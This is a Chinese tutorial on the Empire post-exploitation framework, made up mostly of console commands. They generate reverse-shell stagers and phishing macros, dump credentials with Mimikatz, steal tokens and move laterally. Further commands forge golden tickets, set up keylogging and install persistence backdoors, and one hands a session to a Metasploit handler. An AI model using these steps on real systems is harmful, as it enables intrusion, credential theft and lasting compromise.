后渗透测试神器Empire的详解
一、前言
Empire是一个PowerShell后期漏洞利用代理工具同时也是一款很强大的后渗透测神器,它建立在密码学、安全通信和灵活的架构之上。Empire实现了无需powershell.exe就可运行PowerShell代理的功能。快速部署后期漏洞利用模块,从键盘记录器到Mimikatz,并且能够适应通信躲避网络检测,所有的这些功能都封装在一个以实用性为重点的框架中
二、empire使用详解
1.Empire 的安装
wget https://raw.githubusercontent.com/backlion/demo/master/Empire-master.zip
unzip Empire-master.zip
cd Empire-master
cd setup/
./install.sh
(最后输入数据库密码)注意:新版本貌似有点小问题,我这里采用2015年旧版本可以正常使用.新版本命令有所改变。
重新恢复到初始状态:
root@backlion:/opt/Empire-master# cd setup/
root@backlion:/opt/Empire-master/setup# ls
root@backlion:/opt/Empire-master/setup#
2.简单命令使用
cd Empire-master
./empire
(Empire) > help #主菜单帮助命令
(Empire) > listeners #查看本地监听代理地址,现在还没有会话代理,所以为空
(Empire: listeners) > info #列出详细信息
(Empire: listeners) > set Name bk #设置Name为bk
(Empire: listeners) > execute #执行命令,这条命令将其name设置生效
(Empire: listeners) > usestager launcher bk #调用posershell模块并, name为bk
(Empire: agents) > interact USSZC2P1XCTBKYGH
(Empire: USSZC2P1XCTBKYGH) > upload /tmp/test.hta #文件上传
(Empire: USSZC2P1XCTBKYGH) > shell dir
(Empire: USSZC2P1XCTBKYGH) > download test.hta #文件下载
代理监听IP地址更改:
通过kali下的SQLiteBrowser打开empire下data目录下的数据库empire.db修改监听IP
3.生成反弹shell代理:
3.1 posershell反弹shell代理
(Empire: listeners) > usestager(空格+tab) #查看usestager监听模块
(Empire: listeners) > usestager launcher test #调用powershell模块,test为name名称,这里的name需要提前设置,否则无法导入模块
(Empire: stager/launcher) > execute #执行命令
将上面生成的posershell命令在win7及系统以上执行:
执行命令后Empire端会显示监听成功:
3.2 vbs反弹shell代理
(Empire: listeners) > usestager launcher_vbs test
(Empire: stager/launcher_vbs) > execute #执行命令
将launcher.vbs拷贝到目标主机上执行:
执行命令后Empire端显示监听成功:
(Empire: stager/launcher_vbs) > execute
3.3 钓鱼宏代理
在empire端执行:
(Empire: listeners) > usestager macro bk
(Empire: stager/macro) > info
(Empire: stager/macro) > execute
root@backlion:~#cat /tmp/macro
将生产的代码复制创建到execl的宏代码中:
这里是将保存为execl2003的文档并执行:
4.代理界面的命令使用
(Empire: stager/launcher_vbs) > agents #查看代理情况,带有(*)的是已被提升过的代理,可通过bypassuac进行提权
(Empire: agents) > rename EEDLABPF43FAGWHZ DC #重新命名代理名
(Empire: agents) > list #列出代理
(Empire: agents) > list stale #列出已丢失反弹代理
(Empire: agents) > remove stale #删除已丢失反弹代理
(Empire: agents) > list
(Empire: agents) > interact Y1DMVFG4CGKB24KP #进入到某个代理主机中,这里注意的是带有*的用户名对应的代理是具有管理员高权限代理。如果是没有需要提权。
(Empire: Y1DMVFG4CGKB24KP) > help #代理界面的命令使用帮助
(Empire: TKRTTL2V3BNRVDK4) > mimikatz #加载mimikatz获取hash
(Empire: TKRTTL2V3BNRVDK4) > creds #查看所有hash值包括明文
(Empire: DGPWHW4E2Z2NT3PL) > creds krbtgt #搜索特定用户的krbtgt
(Empire: DGPWHW4E2Z2NT3PL) > creds plaintext #搜索hash中的明文
(Empire: DGPWHW4E2Z2NT3PL) > creds hash #列出所有hash值(不包括明文)
(Empire: DGPWHW4E2Z2NT3PL) > creds export /opt/hash.csv #导出hash凭证到指定的格式
root@backlion:/opt# cat hash.csv
(Empire: TKRTTL2V3BNRVDK4) > shell ipconfig #查看IP地址
(Empire: TKRTTL2V3BNRVDK4) > shell net localgroup administrators #查看管理员组
(Empire: TKRTTL2V3BNRVDK4) > back #返回上一层
5.模块化使用案列:
5.1检查UAC提权方法模块
(Empire: agents) > interact P2V4CXEGRPHUD43T #进入到代理主机
(Empire: P2V4CXEGRPHUD43T) > usemodule(空格+tab键) #查看usemodule的模块,注意需要在进入到代理主机才能使用该模块,UAC提权需要是管理员组的用户才行
(Empire: P2V4CXEGRPHUD43T) > usemodule privesc/powerup/allchecks #检查提权方法模块
(Empire: privesc/powerup/allchecks) > execute #执行检查
(Empire: privesc/powerup/allchecks) > back #返回上一命令界面
5.2 UAC提权模块
(Empire: P2V4CXEGRPHUD43T) > bypassuac test #执行uac提权,这里的test就是默认的name,可以自定义,貌似有问题,建议默认就可以了。
(Empire: P2V4CXEGRPHUD43T) > agents #查看到提权后UAC的name对应主机(带有*的用户的name,表示代理已提权过)
(Empire: agents) > interact P2V4CXEGRPHUD43T #进入提权后的的uac主机
(Empire: P2V4CXEGRPHUD43T) > ps #查看进程
5.3 本地管理组访问模块
(Empire: HPEUGGBSPSAPWGZW) >usemodule situational_awareness/network/find_localadmin_access #加载本地管理组访问模块
(Empire: situational_awareness/network/find_localadmin_access) > info #查看信息
(Empire: situational_awareness/network/find_localadmin_access) > execute #执行命令
(Empire: situational_awareness/network/find_localadmin_access) > back #返回上一命令界面
5.4用户账号枚举信息
(Empire: HPEUGGBSPSAPWGZW) > situational_awareness/network/get_use
(Empire: situational_awareness/network/get_user) > set UserName bk
(Empire: situational_awareness/network/get_user) > set Domain bk.com
(Empire: situational_awareness/network/get_user) > execute #这里可以累出具体某个用户的信息
5.5网络用户会话登录情况
(Empire: HPEUGGBSPSAPWGZW) >usemodule situational_awareness/network/userhunter
(Empire: situational_awareness/network/userhunter) > info
(Empire: situational_awareness/network/userhunter) > execute #这里可以清楚得到那个用户登录给某台主机
5.6 网络扫描
(Empire: HPEUGGBSPSAPWGZW) > shell ping -a -n 1 192.168.99.104 #这里ping管理员登录过的会话IP地址所得到主机名
(Empire: HPEUGGBSPSAPWGZW) > usemodule situational_awareness/network/arpscan
(Empire: situational_awareness/network/arpscan) > info
(Empire: situational_awareness/network/arpscan) > set Range 10.0.0.100-10.0.0.254
(Empire: situational_awareness/network/arpscan) > info
(Empire: situational_awareness/network/arpscan) > execute
5.6 DNS信息获取
(Empire: situational_awareness/network/arpscan) >usemodule situational_awareness/network/reverse_dns
(Empire: situational_awareness/network/reverse_dns) > info
(Empire: situational_awareness/network/reverse_dns) > execute
5.7 共享文件
(Empire: situational_awareness/network/reverse_dns) >usemodule situational_awareness/network/sharefinder
(Empire: situational_awareness/network/sharefinder) > info
(Empire: situational_awareness/network/sharefinder) > set CheckShareAccess True
(Empire: situational_awareness/network/sharefinder) > execute
5.8 会话令牌偷取获取目标访问权限
(Empire: agents) > interact S4DU3VSRKR3U1DDF
(Empire: S4DU3VSRKR3U1DDF) > ps cmd
(Empire: S4DU3VSRKR3U1DDF) > steal_token 3716
(Empire: S4DU3VSRKR3U1DDF) > shell dir \\SCAN03\c$
5.9 psexec模块横向生成一个反弹代理
(Empire: S4DU3VSRKR3U1DDF) > usemodule lateral_movement/invoke_psexec
(Empire: lateral_movement/invoke_psexec) > info
(Empire: lateral_movement/invoke_psexec) > set Listener test
(Empire: lateral_movement/invoke_psexec) > set ComputerName SCAN03
(Empire: lateral_movement/invoke_psexec) > execute
Empire: lateral_movement/invoke_psexec) > agents
5.10 会话注入得到反弹代理
(Empire: agents) > interact YU3NGBFBPGZTV1DD
(Empire: YU3NGBFBPGZTV1DD) > ps cmd
(Empire: YU3NGBFBPGZTV1DD) > usemodule management/psinject
(Empire: management/psinject) > info
(Empire: management/psinject) > set ProcId 6536 #注入进程建议是lass.exe对应的进程
(Empire: management/psinject) > set Listener test
(Empire: management/psinject) > execute
(Empire: management/psinject) > agents
5.11 Empire和msf的联动
在empire终端执行:
(Empire: agents) > interact XCLLHZZPAWPN1REL
(Empire: XCLLHZZPAWPN1REL) > usemodule code_execution/invoke_shellcode
(Empire: code_execution/invoke_shellcode) > info
(Empire: code_execution/invoke_shellcode) > set Lhost 10.0.0.86
(Empire: code_execution/invoke_shellcode) > set Lport 4433
(Empire: code_execution/invoke_shellcode) > execute
在msf终端执行(这里和empire同一个主机上)
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_https
payload => windows/meterpreter/reverse_https
msf exploit(handler) > set lhost 10.0.0.86
msf exploit(handler) > set lport 4433
msf exploit(handler) > set exitsession false
msf exploit(handler) > exploit -j
5.12 pass the hash
(Empire: XCLLHZZPAWPN1REL) > creds
(Empire: XCLLHZZPAWPN1REL) > pth 7 #进入到令牌pth的cerdiD值
(Empire: XCLLHZZPAWPN1REL) > steal_token 12004 #偷取令牌PID值
(Empire: XCLLHZZPAWPN1REL) > dir \\SCAN03\c$ #利用获取到目标令牌会话来访问目标权限的共享目录
(Empire: XCLLHZZPAWPN1REL) > revtoself #将恢复令牌权限回到原来的状态。
5.13 psexec横向渗透
(Empire: HPEUGGBSPSAPWGZW) > usemodule lateral_movement/invoke_psexec #使用该模块横向渗透
(Empire: lateral_movement/invoke_psexec) > info
(Empire: lateral_movement/invoke_psexec) > set ComputerName SCAN03.bk.com
(Empire: lateral_movement/invoke_psexec) > set Listener test
(Empire: lateral_movement/invoke_psexec) > execute
5.14 域的krbtgt值
(Empire: EEDLABPF43FAGWHZ) > usemodule credentials/mimikatz/dcsync #获取域的krbtgt值,这里注意的是域需要域管理员身份才能获取,普通工作组账户的krbtgt需要管理员身份
(Empire: credentials/mimikatz/dcsync) > set user dc2\krbtgt
(Empire: credentials/mimikatz/dcsync) > info
(Empire: credentials/mimikatz/dcsync) > execute
5.15 Golden Tickets
(Empire: EEDLABPF43FAGWHZ) > usemodule credentials/mimikatz/golden_ticket
(Empire: credentials/mimikatz/golden_ticket) > creds
(Empire: credentials/mimikatz/golden_ticket) > set CredID 1
(Empire: credentials/mimikatz/golden_ticket) > set user administrator
(Empire: credentials/mimikatz/golden_ticket) > execute
(Empire: credentials/mimikatz/golden_ticket) >usemodule credentials/mimikatz/purge #清理黄金票据会话
(Empire: credentials/mimikatz/golden_ticket) > execute
5.16 获取系统日志事件
(Empire: situational_awareness/network/reverse_dns) >usemodule situational_awareness/host/computerdetails
(Empire: situational_awareness/host/computerdetails) > info
(Empire: situational_awareness/host/computerdetails) > execute
5.17 收集目标主机有用的信息
(Empire: agents) > interact EEDLABPF43FAGWHZ
(Empire: EEDLABPF43FAGWHZ) > usemodule situational_awareness/host/winenum
(Empire: situational_awareness/host/winenum) > info
(Empire: situational_awareness/host/winenum) > info
5.18 查看网络共享
(Empire: EEDLABPF43FAGWHZ) >usemodule situational_awareness/network/stealth_userhunter
(Empire: situational_awareness/network/stealth_userhunter) > info
(Empire: situational_awareness/network/stealth_userhunter) > execute
5.19 桌面截屏
(Empire: USSZC2P1XCTBKYGH) > usemodule collection/screenshot
(Empire: collection/screenshot) > info
(Empire: collection/screenshot) > execute
(Empire: collection/screenshot) > usemodule collection/keylogger
(Empire: collection/keylogger) > info
(Empire: collection/keylogger) > execute
5.20 权限持久性的注册表注入
(Empire: EEDLABPF43FAGWHZ) > usemodule persistence/userland/registry
(Empire: persistence/userland/registry) > info
(Empire: persistence/userland/registry) > set Listener bk
(Empire: persistence/userland/registry) >set RegPath HKCU:Software\Microsoft\Windows\CurrentVersion\Run
(Empire: persistence/userland/registry) > execute
5.21 权限持久性的计划任务注册
在empire上执行计划任务:
(Empire: WC1PKXFTA4KNTFN4) > usemodule persistence/userland/schtasks
(Empire: persistence/userland/schtasks) > info
(Empire: persistence/userland/schtasks) > set Listener bk
(Empire: persistence/userland/schtasks) > set DailyTime 05:00
(Empire: persistence/userland/schtasks) >set RegPath HKCU:SOFTWARE\Microsoft\Windows\CurrentVersion\Run
(Empire: persistence/userland/schtasks) > execute
同时在目标主机上查看计划任务和注册表情况可以看到成功创建:
5.22 权限持久性的AD用户是否存在触发
(Empire: AG2RV3CFLLY4PZZ4) > usemodule persistence/powerbreach/deaduser
(Empire: persistence/powerbreach/deaduser) > info
(Empire: persistence/powerbreach/deaduser) > set Username DC2\test
(Empire: persistence/powerbreach/deaduser) > set Listener bk
(Empire: persistence/powerbreach/deaduser) > execute只要AD域管理员上修改用户名或者删除用户名就会触发生产后门,这里是将test用户修改为bk,马上触发条件。
5.21权限持久性劫持shift后门
(Empire: ASMR14VVZG4A33AE) > usemodule lateral_movement/invoke_wmi_debugger
(Empire: lateral_movement/invoke_wmi_debugger) > info
(Empire: lateral_movement/invoke_wmi_debugger) > set Listener bk
(Empire: lateral_movement/invoke_wmi_debugger) > set TargetBinary sethc.exe
\#注意这里可以将sethc.exe替换为Utilman.exe(快捷键为: Win + U)或者osk.exe(屏幕上的键盘Win + U启动再选择)Narrator.exe (启动讲述人Win + U启动再选择) Magnify.exe(放大镜Win + U启动再选择)
(Empire: lateral_movement/invoke_wmi_debugger) > set ComputerName CLINCET2
(Empire: lateral_movement/invoke_wmi_debugger) > execute
6.子域和父域的信任跳转
- lab.local和dev.lab.local分别为父域和子域,现已得到子域的反弹代理。
- 在子域上通过:
usemodule situational_awareness/network/powerview/get_domain_trust模块来检查子域和父域的信任关系(dev.lab.local 和他的父域lab.local是双向信任,子域的DA证书来控制整个域)
- 得到父域lab.local的LAB\krbtg账号sid值,这里使用模块
usemodule management/user_to_sid,并设置域,以及用户名
4、通过模块usemodule credentials/mimikatz/dcsync获取子域账号krbtgt的hash值,这里只需设置子域账号即可
5、通过creds krbtget 搜索子域krbtget的hash值:
6.通过黄金票据来伪造(usemodule credentials/mimikatz/golden_ticket)父域lab.local\Enterprise管理员账号,这里需要设置伪造的用户为子域中的一个普通账号,设置sids为父域krbtget的sid值需要把后面的502改成519,最后执行
7.通过模块usemodule credentials/mimikatz/dcsync获取父域账号krbtgt的hash值,这里只需设置子域账号,以及父域的名称
8.再次通过creds krbtgt搜索出hash 值可得到父域的hash值:
9.子域具有访问父域的共享文件权限
(Empire: DGPWHW4E2Z2NT3PL) >usemodule credentials/mimikatz/golden_ticket t
(Empire: DGPWHW4E2Z2NT3PL) > set CredID 14
(Empire: DGPWHW4E2Z2NT3PL) > set user lolhax
(Empire: DGPWHW4E2Z2NT3PL) >set sids 95505cle3d98a458128845353b988
(Empire: DGPWHW4E2Z2NT3PL) >execute
三、emprie总结
通过一系列学习emprie功能,它可以联动MSF进行更为强大的后渗透测试,甚至包括强大的权限持久性以及对域的渗透丰富功能模块。